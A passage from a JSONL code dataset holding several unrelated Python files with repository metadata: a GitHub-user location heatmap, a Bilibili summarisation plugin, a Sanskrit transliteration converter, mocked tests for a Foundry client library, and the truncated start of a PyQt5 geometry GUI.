run_query(query)\n geolocator = Nominatim(timeout=100, user_agent='github_heatmap')\n\n f = open(\"coordinates.txt\",\"a\")\n for row in rows:\n thread = threading.Thread(target=geocode, args=(row[0], row[1], f,))\n thread.start()\n thread.join()\n f.close()\n\ndef get_coordinates_excluded():\n query='''\n SELECT location, COUNT(*) as count\n FROM github_users\n WHERE \n (location IS NOT NULL and location !='null') AND\n LOWER(location) LIKE '%india%' OR\n LOWER(location) LIKE '%china%'\n GROUP BY location\n HAVING COUNT(*) > 100\n ORDER BY count DESC\n '''\n\n # rows = run_query(query)\n f = open(\"rows.txt\", \"r\")\n rows = ast.literal_eval(f.read().strip())\n\n geolocator = Nominatim(timeout=100, user_agent='github_heatmap')\n\n f = open(\"coordinates_excluded.txt\",\"a\")\n for row in rows:\n thread = threading.Thread(target=geocode, args=(row[0], row[1], f,))\n thread.start()\n thread.join()\n f.close()\n\n\ndef make_heatmap():\n f = open(\"coordinates.txt\", \"r\")\n lines = f.readlines()\n grid = []\n for line in lines:\n grid.append(line.strip().split(', ')[-3:])\n grid = [ [float(j), float(k[:-1]), int(i)] for i, j, k in grid ]\n print(grid)\n hmap = folium.Map(location=[0.0, 0.0], zoom_start=3)\n hm_wide = HeatMap(grid,\n min_opacity=0.2,\n max_val=38000,\n radius=17, blur=15, \n max_zoom=1, \n )\n hmap.add_child(hm_wide)\n hmap.save('heatmap.html')\n\ndef make_heatmap_ghtorrent():\n query='''\n SELECT lat, long, COUNT(*) as count\n FROM users\n WHERE \n (location IS NOT NULL and location !='null')\n AND (lat != 0 AND long != 0)\n GROUP BY lat, long\n HAVING COUNT(*) > 10\n ORDER BY count DESC\n '''\n\n rows = run_query(query)\n grid = [ list(row) for row in rows ]\n hmap = folium.Map(location=[0.0, 0.0], zoom_start=3)\n hm_wide = HeatMap(grid,\n min_opacity=0.2,\n max_val=38000,\n radius=17, blur=15, \n max_zoom=1, \n )\n hmap.add_child(hm_wide)\n hmap.save('heatmap_ghtorrent.html')\n\n\nif __name__ == '__main__':\n make_heatmap_ghtorrent()\n","repo_name":"nealav/github-scraper","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"29"} +{"seq_id":"25940154927","text":"import re\nfrom typing import List\n\nfrom loguru import logger\n\nfrom ..config import plugin_config\nfrom ..model.cache import Cache\nfrom ..model.exception import AbortError\nfrom ..optional import capture_exception # type: ignore\nfrom .openai import get_small_size_transcripts, get_summarise_prompt, openai_req\nfrom .text_to_image import t2i\n\n\nasync def subtitle_summarise(title: str, sub: List[str]):\n small_size_transcripts = get_small_size_transcripts(title, sub)\n prompt = get_summarise_prompt(title, small_size_transcripts)\n logger.debug(prompt)\n return await openai_req(prompt)\n\n\nasync def column_summarise(cv_title: str, cv_text: List[str]):\n small_size_transcripts = get_small_size_transcripts(cv_title, cv_text)\n prompt = get_summarise_prompt(cv_title, small_size_transcripts, type_=\"专栏文章\")\n logger.debug(prompt)\n return await openai_req(prompt)\n\n\nasync def openai_summarization(cache: Cache, cid: str = \"0\"):\n try:\n if not cache.episodes[cid].openai:\n if cache.id[:2].lower() in [\"bv\", \"av\"]:\n ai_summary = await subtitle_summarise(cache.title, cache.episodes[cid].content)\n elif cache.id[:2].lower() == \"cv\":\n ai_summary = await column_summarise(cache.title, cache.episodes[cid].content)\n else:\n raise ValueError(f\"Illegal Video(Column) types {cache.id}\")\n\n if ai_summary.response:\n cache.episodes[cid].openai = ai_summary.response\n cache.save()\n else:\n logger.warning(f\"Video(Column) {cache.id} summary failure: {ai_summary.raw}\")\n return f\"视频(专栏) {cache.id} 总结失败: 响应内容异常\\n{ai_summary.raw}\"\n return await t2i(cache.episodes[cid].openai or \"视频无法总结\", plugin_config.bilichat_openai_model)\n except AbortError as e:\n logger.exception(f\"Video(Column) {cache.id} summary aborted: {e}\")\n return f\"视频(专栏) {cache.id} 总结中止: {e}\"\n except Exception as e:\n capture_exception()\n logger.exception(f\"Video(Column) {cache.id} summary failed: {e}\")\n return f\"视频(专栏) {cache.id} 总结失败: {e}\"\n","repo_name":"Misaka-Mikoto-Tech/nonebot-plugin-bilichat","sub_path":"nonebot_plugin_bilichat/summary/openai_summarise.py","file_name":"openai_summarise.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"24932526568","text":"import sys\nimport os\nimport subprocess as sp\n\nimport json\n\nfrom tqdm import tqdm\n\nimport common_methods as cm\nfrom devconvert import dev2slp, iast2slp, slp2dev, slp2iast, slp2tex, slp2wx, wx2slp, dev2wx\n\nscript, sent, dcs_dir, new_dcs_dir, missed, already = sys.argv\n\n\nletter_dict = {\n \"Ā\" : \"ā\", \"Ī\" : \"ī\", \"Ū\" : \"ū\", \"Ṛ\" : \"ṛ\", \"Ṝ\" : \"ṝ\", \"Ḷ\" : \"ḷ\",\n \"Ḹ\" : \"ḹ\", \"Ṅ\" : \"ṅ\", \"Ñ\" : \"ñ\", \"Ṭ\" : \"ṭ\", \"Ḍ\" : \"ḍ\", \"Ṇ\" : \"ṇ\",\n \"Ś\" : \"ś\", \"Ṣ\" : \"ṣ\"\n}\n\ndef iast2wx(text):\n \"\"\" Converts the input string text from iast to wx notation. \"\"\"\n \n return slp2wx.convert(iast2slp.convert(text))\n \n\ndef uncapitalise(text):\n \"\"\" Converts all the upper case letters to its corresponding lower\n case letters\n \"\"\"\n \n for key, value in letter_dict.items():\n text = text.replace(key, value)\n \n return text.lower()\n \n\ndef u_and_c(text):\n \"\"\" Uncapitalises first and then converts the text from iast \n to wx notation\n \"\"\"\n \n return iast2wx(uncapitalise(text))\n\n\ndef convert_to_wx(data):\n \"\"\" Converts all the details in data from iast to wx notation.\n \n Input -> data (data from DCS), source, destination notations\n \"\"\"\n \n new_data = {}\n \n new_data[\"text\"] = u_and_c(data.get(\"text\", \"\"))\n new_data[\"text_id\"] = data.get(\"text_id\", \"\")\n new_data[\"chapter\"] = u_and_c(data.get(\"chapter\", \"\"))\n new_data[\"chapter_id\"] = data.get(\"chapter_id\", \"\")\n new_data[\"sent_counter\"] = data.get(\"sent_counter\", \"\")\n new_data[\"sent_sub_counter\"] = data.get(\"sent_sub_counter\", \"\")\n new_data[\"layer\"] = data.get(\"layer\", \"\")\n new_data[\"citation_text\"] = u_and_c(data.get(\"citation_text\", \"\"))\n new_data[\"citation_chapter\"] = data.get(\"citation_chapter\", \"\")\n \n new_data[\"sent_id\"] = data.get(\"sent_id\", \"\")\n new_data[\"joint_sentence\"] = iast2wx(data.get(\"joint_sentence\", \"\"))\n new_data[\"position\"] = data.get(\"position\", [])\n \n dcs_unsegmented_forms = data.get(\"unsegmented_form\", [])\n dcs_word_forms = data.get(\"word_form\", [])\n dcs_stems = data.get(\"stem\", [])\n dcs_words = data.get(\"word\", [])\n dcs_miscs = data.get(\"misc\", [])\n dcs_preverbs = data.get(\"preverbs\", [])\n \n new_unsegmented_forms = []\n new_stems = []\n new_words = []\n new_word_forms = []\n new_preverbs = []\n new_miscs = []\n \n position = new_data[\"position\"]\n for i in range(len(position)):\n new_unsegmented_forms.append(iast2wx(dcs_unsegmented_forms[i]))\n new_inner_stems = []\n new_inner_words = []\n new_inner_word_forms = []\n new_inner_preverbs = []\n new_inner_miscs = []\n \n for j in range(len(position[i])):\n new_inner_stems.append(iast2wx(dcs_stems[i][j]))\n new_inner_words.append(iast2wx(dcs_words[i][j]))\n new_inner_word_forms.append(iast2wx(dcs_word_forms[i][j]))\n new_inner_preverbs.append(iast2wx(dcs_preverbs[i][j]))\n\n misc_lst = dcs_miscs[i][j].split(\"|\")\n new_misc_lst = []\n for misc_item in misc_lst:\n misc_item_split = misc_item.split(\"=\")\n new_misc_val = misc_item_split[1]\n if misc_item_split[0] == \"Unsandhied\":\n new_misc_val = iast2wx(new_misc_val)\n new_misc_lst.append(\"=\".join((misc_item_split[0], new_misc_val)))\n \n new_inner_miscs.append(\"|\".join(new_misc_lst))\n \n new_stems.append(new_inner_stems)\n new_words.append(new_inner_words)\n new_word_forms.append(new_inner_word_forms)\n new_preverbs.append(new_inner_preverbs)\n new_miscs.append(new_inner_miscs)\n \n new_data[\"unsegmented_form\"] = new_unsegmented_forms\n new_data[\"stem\"] = new_stems\n new_data[\"stem_id\"] = data.get(\"stem_id\")\n new_data[\"morph\"] = data.get(\"morph\")\n new_data[\"word\"] = new_words\n new_data[\"word_form\"] = new_word_forms\n new_data[\"preverbs\"] = new_preverbs\n \n new_data[\"upos\"] = data.get(\"upos\")\n new_data[\"xpos\"] = data.get(\"xpos\")\n new_data[\"head\"] = data.get(\"head\")\n new_data[\"deprel\"] = data.get(\"deprel\")\n new_data[\"deps\"] = data.get(\"deps\")\n new_data[\"misc\"] = new_miscs\n new_data[\"sem_ids\"] = data.get(\"sem_ids\")\n new_data[\"word_reconstructed\"] = data.get(\"word_reconstructed\")\n new_data[\"occ_ids\"] = data.get(\"occ_ids\")\n new_data[\"grammar\"] = data.get(\"grammar\")\n new_data[\"punctuation\"] = data.get(\"punctuation\")\n new_data[\"meanings\"] = data.get(\"meanings\")\n new_data[\"is_mantra\"] = data.get(\"is_mantra\")\n \n return new_data\n \n\nlines = cm.list_from_file(sent)\nmissed_file = open(missed, 'w')\nalready_file = open(already, 'w')\n\n#for x in range(len(lines)):\nfor i in tqdm(range(len(lines))):\n line = lines[i]\n line_s = line.split(\"\\t\")\n \n sent_id = line_s[0]\n sentence = line_s[1]\n \n dcs_path = os.path.join(dcs_dir, (str(sent_id) + \".json\"))\n if not os.path.isfile(dcs_path):\n missed_file.write(line + \"\\n\")\n continue\n \n new_json_path = os.path.join(new_dcs_dir, (str(sent_id) + \".json\"))\n if os.path.isfile(new_json_path):\n already_file.write(line + \"\\n\")\n continue\n \n dcs_data = cm.get_dcs_json(sent_id, dcs_dir)\n new_data = convert_to_wx(dcs_data)\n \n with open(new_json_path, 'w', encoding='utf-8') as out_file:\n json.dump(new_data, out_file, ensure_ascii=False)\n","repo_name":"SriramKrishnan8/dcs_sh_alignment","sub_path":"code/convert_dcs_to_wx.py","file_name":"convert_dcs_to_wx.py","file_ext":"py","file_size_in_byte":5481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"41315428182","text":"import os\nfrom pathlib import Path\nfrom unittest import mock\nfrom unittest.mock import MagicMock, patch\n\nimport fs\nimport pandas as pd\nimport pytest\nfrom pandas.testing import assert_frame_equal\nfrom pyspark.sql import SparkSession\n\nfrom foundry_dev_tools.cached_foundry_client import CachedFoundryClient\nfrom foundry_dev_tools.config import Configuration\nfrom foundry_dev_tools.foundry_api_client import (\n BranchNotFoundError,\n DatasetNotFoundError,\n)\nfrom foundry_dev_tools.utils.spark import get_spark_session\nfrom tests.foundry_mock_client import MockFoundryRestClient\n\nDATASET_RID = \"ri.foundry.main.dataset.12345de3-b916-46ba-b097-c4326ea4342e\"\nDATASET_PATH = \"/mock/path/ds1\"\nTRANSACTION_RID = \"transaction1\"\nAPI = \"foundry_dev_tools.foundry_api_client.FoundryRestClient\"\n\n\n@pytest.fixture()\ndef mock_client(tmpdir):\n return MockFoundryRestClient(filesystem=fs.open_fs(os.fspath(tmpdir)))\n\n\ndef test_config():\n fdt = CachedFoundryClient({\"jwt\": \"secret\"})\n\n assert fdt.api._headers()[\"Authorization\"] == \"Bearer secret\"\n assert fdt.api._requests_verify_value is not None\n\n\n@patch(\n API + \".get_dataset_identity\",\n MagicMock(\n return_value={\n \"dataset_rid\": DATASET_RID,\n \"dataset_path\": DATASET_PATH,\n \"last_transaction_rid\": TRANSACTION_RID,\n }\n ),\n)\n@patch(API + \".get_dataset\", MagicMock())\n@patch(API + \".get_branch\", MagicMock())\n@patch(API + \".is_dataset_in_trash\", MagicMock(return_value=False))\n@patch(API + \".open_transaction\", MagicMock(return_value=TRANSACTION_RID))\n@patch(API + \".commit_transaction\", MagicMock())\n@patch(API + \".infer_dataset_schema\", MagicMock())\n@patch(API + \".upload_dataset_schema\", MagicMock())\n@patch(API + \".upload_dataset_files\")\ndef test_save_pandas(upload_dataset_files):\n fdt = CachedFoundryClient()\n dataset_rid, transaction_id = fdt.save_dataset(\n pd.DataFrame(data={\"col1\": [1, 2], \"col2\": [3, 4]}),\n dataset_path_or_rid=DATASET_PATH,\n branch=\"master\",\n exists_ok=True,\n mode=\"SNAPSHOT\",\n )\n\n args = upload_dataset_files.call_args[0]\n\n assert args[0] == DATASET_RID\n assert args[1] == TRANSACTION_RID\n # 1 file uploaded\n assert len(args[2]) == 1\n\n assert dataset_rid == \"ri.foundry.main.dataset.12345de3-b916-46ba-b097-c4326ea4342e\"\n assert transaction_id == \"transaction1\"\n\n\n@patch(\n API + \".get_dataset_identity\",\n MagicMock(\n return_value={\n \"dataset_rid\": DATASET_RID,\n \"dataset_path\": DATASET_PATH,\n \"last_transaction_rid\": TRANSACTION_RID,\n }\n ),\n)\n@patch(API + \".get_dataset\", MagicMock())\n@patch(API + \".get_branch\", MagicMock())\n@patch(API + \".is_dataset_in_trash\", MagicMock(return_value=False))\n@patch(API + \".open_transaction\", MagicMock(return_value=TRANSACTION_RID))\n@patch(API + \".commit_transaction\", MagicMock())\n@patch(API + \".infer_dataset_schema\", MagicMock())\n@patch(API + \".upload_dataset_schema\", MagicMock())\n@patch(API + \".upload_dataset_files\")\ndef test_save_spark(upload_dataset_files):\n fdt = CachedFoundryClient()\n df = (\n SparkSession.builder.master(\"local[*]\")\n .getOrCreate()\n .createDataFrame([[1, 2]], \"a:string, b: string\")\n )\n dataset_rid, transaction_id = fdt.save_dataset(\n df,\n dataset_path_or_rid=DATASET_PATH,\n branch=\"master\",\n exists_ok=True,\n mode=\"SNAPSHOT\",\n )\n\n args = upload_dataset_files.call_args[0]\n\n assert args[0] == DATASET_RID\n assert args[1] == TRANSACTION_RID\n # at least two files uploaded, one parquet and one _SUCCESS\n assert len(args[2]) >= 2\n\n assert dataset_rid == \"ri.foundry.main.dataset.12345de3-b916-46ba-b097-c4326ea4342e\"\n assert transaction_id == \"transaction1\"\n\n\n@patch(\n API + \".get_dataset_identity\",\n MagicMock(\n return_value={\n \"dataset_rid\": DATASET_RID,\n \"dataset_path\": DATASET_PATH,\n \"last_transaction_rid\": TRANSACTION_RID,\n }\n ),\n)\n@patch(API + \".get_dataset\", MagicMock())\n@patch(API + \".get_branch\", MagicMock())\n@patch(API + \".is_dataset_in_trash\", MagicMock(return_value=False))\n@patch(API + \".open_transaction\", MagicMock(return_value=TRANSACTION_RID))\n@patch(API + \".commit_transaction\", MagicMock())\n@patch(API + \".infer_dataset_schema\", MagicMock())\n@patch(API + \".upload_dataset_schema\", MagicMock())\n@patch(API + \".upload_dataset_files\")\ndef test_save_model(upload_dataset_files):\n fdt = CachedFoundryClient()\n dataset_rid, transaction_id = fdt.save_model(\n {\"wow\": \"awesome_ml_model\"},\n dataset_path_or_rid=DATASET_PATH,\n branch=\"master\",\n exists_ok=True,\n mode=\"SNAPSHOT\",\n )\n\n args = upload_dataset_files.call_args[0]\n\n assert args[0] == DATASET_RID\n assert args[1] == TRANSACTION_RID\n # one model object should be uploaded\n assert len(args[2]) == 1\n assert \"model.pickle\" in args[2]\n\n assert dataset_rid == \"ri.foundry.main.dataset.12345de3-b916-46ba-b097-c4326ea4342e\"\n assert transaction_id == \"transaction1\"\n\n\n@patch(API + \".abort_transaction\")\n@patch(API + \".create_branch\")\n@patch(API + \".create_dataset\")\n@patch(API + \".upload_dataset_files\")\n@patch(API + \".upload_dataset_schema\")\n@patch(API + \".infer_dataset_schema\")\n@patch(API + \".commit_transaction\")\n@patch(API + \".open_transaction\")\n@patch(API + \".is_dataset_in_trash\")\n@patch(API + \".get_branch\")\n@patch(API + \".get_dataset\")\n@patch(API + \".get_dataset_identity\")\ndef test_save_objects(\n get_dataset_identity,\n get_dataset,\n get_branch,\n is_dataset_in_trash,\n open_transaction,\n commit_transaction,\n infer_dataset_schema,\n upload_dataset_schema,\n upload_dataset_files,\n create_dataset,\n create_branch,\n abort_transaction,\n):\n fdt = CachedFoundryClient()\n path_file_dict = {\"path-in/foundry.pickle\": Path.cwd()}\n\n # happy path, dataset does not exist!\n get_dataset_identity.side_effect = DatasetNotFoundError(\"dataset_rid\")\n create_dataset.return_value = {\"rid\": DATASET_RID}\n is_dataset_in_trash.return_value = False\n open_transaction.return_value = TRANSACTION_RID\n dataset_rid, transaction_id = fdt._save_objects(\n path_file_dict, DATASET_PATH, \"master\", exists_ok=False, mode=\"SNAPSHOT\"\n )\n\n assert dataset_rid == \"ri.foundry.main.dataset.12345de3-b916-46ba-b097-c4326ea4342e\"\n assert transaction_id == \"transaction1\"\n commit_transaction.assert_called_once()\n abort_transaction.assert_not_called()\n commit_transaction.reset_mock()\n abort_transaction.reset_mock()\n get_dataset_identity.side_effect = None\n get_dataset_identity.return_value = {\n \"dataset_rid\": DATASET_RID,\n \"dataset_path\": DATASET_PATH,\n }\n\n # Error in upload files -> verify abort transaction is called\n upload_dataset_files.side_effect = OSError()\n with pytest.raises(ValueError): # noqa: PT011\n fdt._save_objects(\n path_file_dict,\n DATASET_PATH,\n \"master\",\n exists_ok=True,\n mode=\"SNAPSHOT\",\n )\n commit_transaction.assert_not_called()\n abort_transaction.assert_called_once()\n upload_dataset_files.side_effect = None\n\n # ValueError is thrown when dataset exists already\n with pytest.raises(ValueError): # noqa: PT011\n fdt._save_objects(\n path_file_dict,\n DATASET_PATH,\n \"master\",\n exists_ok=False,\n mode=\"SNAPSHOT\",\n )\n\n # ValueError is thrown when dataset is in trash\n is_dataset_in_trash.return_value = True\n with pytest.raises(ValueError): # noqa: PT011\n fdt._save_objects(\n path_file_dict,\n DATASET_PATH,\n \"master\",\n exists_ok=True,\n mode=\"SNAPSHOT\",\n )\n is_dataset_in_trash.return_value = False\n\n # branch is created when it does not exist\n get_branch.side_effect = BranchNotFoundError(\"dataset_rid\", \"branch\")\n create_branch.reset_mock()\n fdt._save_objects(\n path_file_dict,\n DATASET_PATH,\n \"does-not-exist\",\n exists_ok=False,\n mode=\"SNAPSHOT\",\n )\n create_branch.assert_called_once()\n\n\n@patch(\n API + \".get_dataset_identity\",\n MagicMock(\n return_value={\n \"dataset_rid\": DATASET_RID,\n \"dataset_path\": DATASET_PATH,\n \"last_transaction_rid\": TRANSACTION_RID,\n \"last_transaction\": {\"rid\": TRANSACTION_RID, \"transaction\": {}},\n }\n ),\n)\n@patch(API + \".get_dataset_schema\")\n@patch(API + \".list_dataset_files\")\n@patch(API + \".is_dataset_in_trash\")\n@patch(API + \".get_dataset_last_transaction\")\n@patch(API + \".get_dataset_rid\")\ndef test_fetch_dataset(\n get_dataset_rid,\n get_dataset_last_transaction,\n is_dataset_in_trash,\n list_dataset_files,\n get_dataset_schema,\n mocker,\n):\n from_foundry_and_cache = mocker.spy(\n CachedFoundryClient,\n \"_download_dataset_and_return_local_path\",\n )\n from_cache = mocker.spy(\n CachedFoundryClient,\n \"_return_local_path_of_cached_dataset\",\n )\n online = mocker.spy(\n CachedFoundryClient,\n \"_get_dataset_identity_online\",\n )\n offline = mocker.spy(\n CachedFoundryClient,\n \"_get_dataset_identity_offline\",\n )\n\n get_dataset_rid.return_value = DATASET_RID\n get_dataset_last_transaction.return_value = {\"rid\": TRANSACTION_RID}\n is_dataset_in_trash.return_value = False\n df = get_spark_session().createDataFrame([[1]], \"col1:int\")\n get_dataset_schema.return_value = {\n \"fieldSchemaList\": [\n {\"type\": \"INTEGER\", \"name\": \"col1\", \"nullable\": True, \"customMetadata\": {}}\n ],\n \"dataFrameReaderClass\": \"com.palantir.foundry.spark.input.ParquetDataFrameReader\",\n \"customMetadata\": {\"format\": \"parquet\", \"options\": {}},\n }\n list_dataset_files.return_value = [\"spark/dataset.parquet\"]\n\n def download_dataset_files_mock(\n self,\n dataset_rid: str,\n output_directory: str,\n files: list,\n view=\"master\",\n ):\n path = Path(output_directory).joinpath(\"spark\")\n path.mkdir(parents=True, exist_ok=True)\n df.write.format(\"parquet\").option(\"compression\", \"snappy\").save(\n path=os.fspath(path), mode=\"overwrite\"\n )\n\n from foundry_dev_tools.foundry_api_client import FoundryRestClient\n\n backup = FoundryRestClient.download_dataset_files\n FoundryRestClient.download_dataset_files = download_dataset_files_mock\n\n fdt = CachedFoundryClient()\n path, dataset_identity = fdt.fetch_dataset(DATASET_PATH, \"master\")\n assert path.split(os.sep, maxsplit=-1)[-1] == TRANSACTION_RID + \".parquet\"\n assert dataset_identity == {\n \"dataset_rid\": DATASET_RID,\n \"last_transaction_rid\": TRANSACTION_RID,\n \"last_transaction\": {\"rid\": TRANSACTION_RID, \"transaction\": {}},\n \"dataset_path\": DATASET_PATH,\n }\n\n online.assert_called()\n online.reset_mock()\n offline.assert_not_called()\n offline.reset_mock()\n\n from_foundry_and_cache.assert_called()\n from_cache.assert_not_called()\n from_foundry_and_cache.reset_mock()\n from_cache.reset_mock()\n\n path2, dataset_identity2 = fdt.fetch_dataset(DATASET_PATH, \"master\")\n from_foundry_and_cache.assert_not_called()\n from_cache.assert_called()\n online.reset_mock()\n offline.reset_mock()\n\n assert path == path2\n\n # Offline Mode / transforms_freeze_cache = True\n fdt = CachedFoundryClient({\"transforms_freeze_cache\": True})\n path3, dataset_identity3 = fdt.fetch_dataset(DATASET_PATH, \"master\")\n\n assert path == path2 == path3\n\n online.assert_not_called()\n online.reset_mock()\n offline.assert_called()\n offline.reset_mock()\n\n path4, dataset_identity4 = fdt.fetch_dataset(DATASET_RID, \"master\")\n\n assert path == path2 == path3 == path4\n\n FoundryRestClient.download_dataset_files = backup\n\n\n@patch(\n API + \".get_dataset_identity\",\n MagicMock(\n return_value={\n \"dataset_rid\": DATASET_RID,\n \"dataset_path\": DATASET_PATH,\n \"last_transaction_rid\": TRANSACTION_RID,\n \"last_transaction\": {\n \"rid\": TRANSACTION_RID,\n \"transaction\": {\n \"record\": {},\n \"metadata\": {\n \"fileCount\": 1,\n \"hiddenFileCount\": 0,\n \"totalFileSize\": 1000,\n \"totalHiddenFileSize\": 0,\n },\n },\n },\n }\n ),\n)\n@patch(API + \".get_dataset_schema\")\n@patch(API + \".list_dataset_files\")\n@patch(API + \".is_dataset_in_trash\")\n@patch(API + \".get_dataset_rid\")\ndef test_load_dataset(\n get_dataset_rid,\n is_dataset_in_trash,\n list_dataset_files,\n get_dataset_schema,\n mocker,\n):\n from_foundry_and_cache = mocker.spy(\n CachedFoundryClient,\n \"_download_dataset_and_return_local_path\",\n )\n from_cache = mocker.spy(\n CachedFoundryClient,\n \"_return_local_path_of_cached_dataset\",\n )\n fdt = CachedFoundryClient()\n\n get_dataset_rid.return_value = DATASET_RID\n is_dataset_in_trash.return_value = False\n df = get_spark_session().createDataFrame([[1]], \"col1:int\")\n list_dataset_files.return_value = [\"pandas/dataset.parquet\"]\n get_dataset_schema.return_value = {\n \"fieldSchemaList\": [\n {\"type\": \"INTEGER\", \"name\": \"col1\", \"nullable\": True, \"customMetadata\": {}}\n ],\n \"dataFrameReaderClass\": \"com.palantir.foundry.spark.input.ParquetDataFrameReader\",\n \"customMetadata\": {\"format\": \"parquet\", \"options\": {}},\n }\n\n def download_dataset_files_mock(\n self,\n dataset_rid: str,\n output_directory: str,\n files: list,\n view=\"master\",\n *,\n branch: str = \"master\",\n ):\n path = Path(output_directory).joinpath(\"spark\")\n path.mkdir(parents=True, exist_ok=True)\n df.write.format(\"parquet\").option(\"compression\", \"snappy\").save(\n path=os.fspath(path), mode=\"overwrite\"\n )\n\n from foundry_dev_tools.foundry_api_client import FoundryRestClient\n\n backup = FoundryRestClient.download_dataset_files\n FoundryRestClient.download_dataset_files = download_dataset_files_mock\n\n spark_df = fdt.load_dataset(DATASET_PATH, \"master\")\n\n from_foundry_and_cache.assert_called()\n from_cache.assert_not_called()\n from_foundry_and_cache.reset_mock()\n from_cache.reset_mock()\n assert_frame_equal(spark_df.toPandas(), df.toPandas())\n\n fdt.load_dataset(DATASET_PATH, \"master\")\n from_foundry_and_cache.assert_not_called()\n from_cache.assert_called()\n\n FoundryRestClient.download_dataset_files = backup\n\n\ndef test_api_client_not_cached(mocker):\n mocker.patch(\n \"foundry_dev_tools.config.Configuration.get_config\",\n side_effect=[\n {\n \"jwt\": \"secret-token-CACHED-FOUNDRY\",\n \"foundry_url\": \"https://test.com\",\n \"cache_dir\": Configuration[\"cache_dir\"],\n },\n {\n \"jwt\": \"secret-token-ONE\",\n \"foundry_url\": \"https://test.com\",\n \"cache_dir\": Configuration[\"cache_dir\"],\n },\n {\n \"jwt\": \"secret-token-TWO\",\n \"foundry_url\": \"https://test.com\",\n \"cache_dir\": Configuration[\"cache_dir\"],\n },\n ],\n )\n fs = CachedFoundryClient()\n assert fs.config[\"jwt\"] == \"secret-token-CACHED-FOUNDRY\"\n assert fs.api._config[\"jwt\"] == \"secret-token-ONE\"\n assert fs.api._config[\"jwt\"] == \"secret-token-TWO\"\n\n\ndef test_save_string_model(mock_client):\n with mock.patch(\n \"foundry_dev_tools.cached_foundry_client.CachedFoundryClient.api\",\n mock_client,\n ):\n cfc = CachedFoundryClient()\n\n model = \"simplestring\"\n rid, transaction = cfc.save_model(\n model,\n dataset_path_or_rid=\"/Namespace1/project1/save_model_test\",\n branch=\"master\",\n exists_ok=True,\n mode=\"SNAPSHOT\",\n )\n\n from_foundry = cfc.fetch_dataset(\"/Namespace1/project1/save_model_test\")\n import pickle\n\n with Path(from_foundry[0]).joinpath(\"model.pickle\").open(mode=\"rb\") as f:\n model_returned = pickle.load(f) # noqa: S301, trusted, we are mocking\n\n assert model == model_returned\n\n\n@patch(\n API + \".get_dataset_identity\",\n MagicMock(\n return_value={\n \"dataset_rid\": DATASET_RID,\n \"dataset_path\": DATASET_PATH,\n \"last_transaction_rid\": TRANSACTION_RID,\n \"last_transaction\": {\n \"rid\": TRANSACTION_RID,\n \"transaction\": {\n \"record\": {\"view\": True},\n \"metadata\": {\n \"fileCount\": 1,\n \"hiddenFileCount\": 0,\n \"totalFileSize\": 0,\n \"totalHiddenFileSize\": 0,\n },\n },\n },\n }\n ),\n)\n@patch(API + \".get_dataset_schema\")\n@patch(API + \".query_foundry_sql\")\n@patch(API + \".is_dataset_in_trash\")\n@patch(API + \".get_dataset_rid\")\ndef test_load_dataset_is_view(\n get_dataset_rid,\n is_dataset_in_trash,\n query_foundry_sql,\n get_dataset_schema,\n mocker,\n):\n from_cache = mocker.spy(\n CachedFoundryClient,\n \"_return_local_path_of_cached_dataset\",\n )\n fdt = CachedFoundryClient()\n\n get_dataset_rid.return_value = DATASET_RID\n is_dataset_in_trash.return_value = False\n df = get_spark_session().createDataFrame([[1]], \"col1:int\")\n query_foundry_sql.return_value = df\n get_dataset_schema.return_value = {\n \"fieldSchemaList\": [\n {\"type\": \"INTEGER\", \"name\": \"col1\", \"nullable\": True, \"customMetadata\": {}}\n ],\n \"dataFrameReaderClass\": \"com.palantir.foundry.spark.input.ParquetDataFrameReader\",\n \"customMetadata\": {\"format\": \"parquet\", \"options\": {}},\n }\n\n spark_df = fdt.load_dataset(DATASET_PATH, \"master\")\n\n from_cache.assert_called()\n assert query_foundry_sql.call_count == 1\n from_cache.reset_mock()\n assert_frame_equal(spark_df.toPandas(), df.toPandas())\n\n fdt.load_dataset(DATASET_PATH, \"master\")\n assert query_foundry_sql.call_count == 1\n from_cache.assert_called()\n","repo_name":"emdgroup/foundry-dev-tools","sub_path":"tests/test_cached_foundry_client.py","file_name":"test_cached_foundry_client.py","file_ext":"py","file_size_in_byte":18409,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"29"} +{"seq_id":"585729232","text":"from PyQt5.QtWidgets import QWidget, QPushButton, QApplication, QLabel, QLineEdit, QGridLayout,QColorDialog,QMessageBox\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nimport numpy as np\r\n\r\nclass Window(QWidget):\r\n def __init__(self):\r\n QWidget.__init__(self)\r\n # stworzenie przycisku z napisem test\r\n self.button = QPushButton('Oblicz i rysuj', self)\r\n self.xlabel=QLabel(\"współrzędna XA\", self)\r\n self.xEdit=QLineEdit()\r\n self.ylabel=QLabel(\"współrzędna YA\", self)\r\n self.yEdit=QLineEdit()\r\n self.x_2label=QLabel(\"współrzędna XB\", self)\r\n self.x_2Edit=QLineEdit()\r\n self.y_2label=QLabel(\"współrzędna YB\", self)\r\n self.y_2Edit=QLineEdit()\r\n self.x_3label=QLabel(\"współrzędna XC\", self)\r\n self.x_3Edit=QLineEdit()\r\n self.y_3label=QLabel(\"współrzędna YC\", self)\r\n self.y_3Edit=QLineEdit()\r\n self.x_4label=QLabel(\"współrzędna XD\", self)\r\n self.x_4Edit=QLineEdit()\r\n self.y_4label=QLabel(\"współrzędna YD\", self)\r\n self.y_4Edit=QLineEdit()\r\n \r\n #stworzenie przycisków do wyboru koloru \r\n self.clrChoose=QPushButton(\"Wybierz kolor\", self)\r\n \r\n #stworzenie przycisku do usuwania danych \r\n self.button1 = QPushButton('Usuń dane', self)\r\n #stworzenie przycisku do zapisywania danych do pliku\r\n self.button2 = QPushButton('Zapisz', self)\r\n \r\n # połączenie przycisku (signal) z akcją (slot)\r\n self.button.clicked.connect(self.handleButton)\r\n self.clrChoose.clicked.connect(self.clrChooseF)\r\n \r\n #stworzenie okienek i podpisów dla współrzędnych punktu P\r\n self.info = QLabel (\"Informacje o Punkcie P\", self)\r\n self.x_5label = QLabel(\"XP\",self)\r\n self.x_6label = QLabel()\r\n 